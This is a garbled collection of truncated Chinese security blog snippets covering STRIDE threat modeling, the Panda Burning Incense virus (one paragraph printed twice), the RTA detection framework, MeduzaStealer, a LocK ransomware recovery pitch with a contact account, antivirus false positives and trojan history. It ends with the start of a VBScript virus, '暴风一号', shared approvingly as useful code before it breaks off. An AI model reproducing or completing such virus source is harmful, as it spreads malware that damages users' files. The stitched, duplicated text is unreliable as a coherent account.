0x00前言专门拎出来一片来学习威胁建模的详细内容，主要是关注不同的威胁建模方法以及威胁建模实际落地的情况。这里特指的软件安全流程。本篇只针对STRIDE以及它的一个补充进行描述。0x01威胁建模1.威胁建模威胁建模指的是通过分析和思考，识别目标可能出现的漏洞和风险，实际上威胁建模的目的就是提前防护，或者也可以说是预测未来，提前防范。2.主要目在软件开发前预知安全问题，在开发时进行避免提前防护3.威胁建模模型STRIDEDREADPASTAVASTTrikeOCTAVENIST0x02STRIDESTRIDE的四个元素1.四元素外部实体系统控制范围之外的用户、软件系统或设备处理过程表示一个任务

原始故障：偶然有一天，某些开发软件如adb报16位应用程序错误。    1.如点击adb.exe，正常是一闪而过，而感染情况是弹出16位错误，并连续好几次，同时cpu被生成的临时xx.exe占用40%，任务管理器结束该exe结束弹窗。    2.然后重装adb.exe(重稍微正规的网站下载)，这时候是正常情况，重启，或者第二天又会出现1的情况。（看文件时间确实和以前的不一样，大小也有区别）          这个感染后，这个文件的时间和其它文件的时间明显不同。这是360修复后的样子，文件变小。我这里用360杀毒解决，会自动修复好文件。 

病毒介绍：        “熊猫烧香”，是由李俊制作并肆虐网络的一款电脑病毒，熊猫烧香跟灰鸽子不同，是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒，它不但能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件（该类文件是一系统备份工具“GHOST”的备份文件，删除后会使用户的系统备份文件丢失）。    被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。2006年10月16日由25岁的湖北武汉新洲区人李俊编写，2007年1月初肆虐网络，它主要通过下载的文件传染。2007年2月12日，湖北省

病毒介绍：        “熊猫烧香”，是由李俊制作并肆虐网络的一款电脑病毒，熊猫烧香跟灰鸽子不同，是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒，它不但能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件（该类文件是一系统备份工具“GHOST”的备份文件，删除后会使用户的系统备份文件丢失）。    被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。2006年10月16日由25岁的湖北武汉新洲区人李俊编写，2007年1月初肆虐网络，它主要通过下载的文件传染。2007年2月12日，湖北省

关于RTARTA是一款专为蓝队研究人员设计的威胁行为能力检测框架。RTA提供了一套脚本框架，旨在让蓝队针对恶意行为测试其检测能力，该框架是基于MITREATT＆CK模型设计的。RTA由多个Python脚本组成，可以生成50多种不同的ATT＆CK战术策略，以及一个预先编译的二进制应用程序，并根据需要执行文件时间停止、进程注入和信标模拟等活动。在可能的情况下，RTA将尝试执行策略所描述的实际恶意活动。在其他情况下，RTA 将模拟所有或部分活动。例如，某些横向移动操作默认会针对本地主机（尽管参数通常允许进行多主机测试）。在其他情况下，可执行文件（如cmd.exe或python.exe）将被重命名，使

网络安全公司uptycs近日发布报告，发现了非常复杂、用于窃取用户数据的MeduzaStealer恶意软件。MeduzaStealer会监视互联网上的用户活动，提取与浏览器相关的大量数据。MeduzaStealer会劫持加密货币钱包、密码管理器和双因素身份验证工具等浏览器扩展的数据。MeduzaStealer具备很强的防追踪、防检测方式，在断开和攻击者服务器的连接之后，就会停止工作；如果在CIS和Turkmenistan扫描，就会启动自毁机制。在运行过程中，病毒会拦截浏览器数据，从Windows系统注册表收集信息，甚至将受害者计算机上安装的游戏列表发送到控制服务器。该软件的开发人员还考虑了方便

        企业的数据是无价的财富，它是企业业务运作的核心。但突然间，被LocK勒索病毒加密的数据使企业陷入困境，威胁着企业的商业未来。这种情况让人绝望，但别放弃！在本文中，我们将提供一份完整指南，为你展示如何解密和恢复被LocK勒索病毒束缚的企业数据！        如果受感染的数据确实有恢复的价值与必要性，您可添加我们的技术服务号（shujuxf）进行免费咨询获取数据恢复的相关帮助。LocK勒索病毒是一种恶意软件（Malware），它属于勒索软件（Ransomware）的一种。勒索软件是一种针对个人用户和企业网络的恶意软件，其目的是通过加密受害者的数据，然后勒索赎金来解密文件。LocK

首先，我们要注意千万不要下载360，毕竟它捆绑的软件太多。但，安全中心也不可以删除，毕竟他也很重要嘛~那为什么易语言程序会被各大杀毒软件公认为病毒呢？首先，易语言程序采用静态编译，而大多数病毒也通过静态编译保存。其次，各大杀毒软件为图省事，直接将所有静态编译的软件算为病毒。所以，在各种机缘巧合之下，易语言程序就背上了黑锅。那这个时候，我们怎么办？（声明：文章只说明Windows安全中心中出现的问题，不说明360以及其他杀毒软件）1.先进入Windows安全中心，找到威胁。或直接在编译完后单击系统右下角弹窗，进入”病毒和威胁防护“界面。如果像我这样干净利落的，选择”保护历史记录“ 2.如果”病毒

木马的由来"特洛伊木马"（trojanhorse）简称"木马"，据说这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城，久久无法攻下。于是有人献计制造一只高二丈的大木马，假装作战马神，让士兵藏匿于巨大的木马中，大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后，遂将"木马"作为奇异的战利品拖入城内，全城饮酒狂欢。到午夜时分，全城军民尽入梦乡，匿于木马中的将士开秘门游绳而下，开启城门及四处纵火，城外伏兵涌入，部队里应外合，焚屠特洛伊城。后世称这只大木马为"特洛伊木马"。如今黑客程序借用其名，有"一经潜入，后患无穷"之意。完整的木马程序一般由两个部分组成：一个是服务器端，一个

最近我看到了一些很有趣的代码（主要是因为他是病毒），来，话不多说直接上代码，希望对大家有帮助，此外，我要对它的名称进行说明，他的中文名是暴风一号，英文名是BoyFineOnErrorResumeNextDimFso,WshShellSetFso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")SetWshShell=CreateObject("wScRipT.SHelL")CallMainSubMain()OnErrorResumeNextDimArgs,VirusLoad,VirusAssSetArgs=WScript.ArgumentsVirusLoad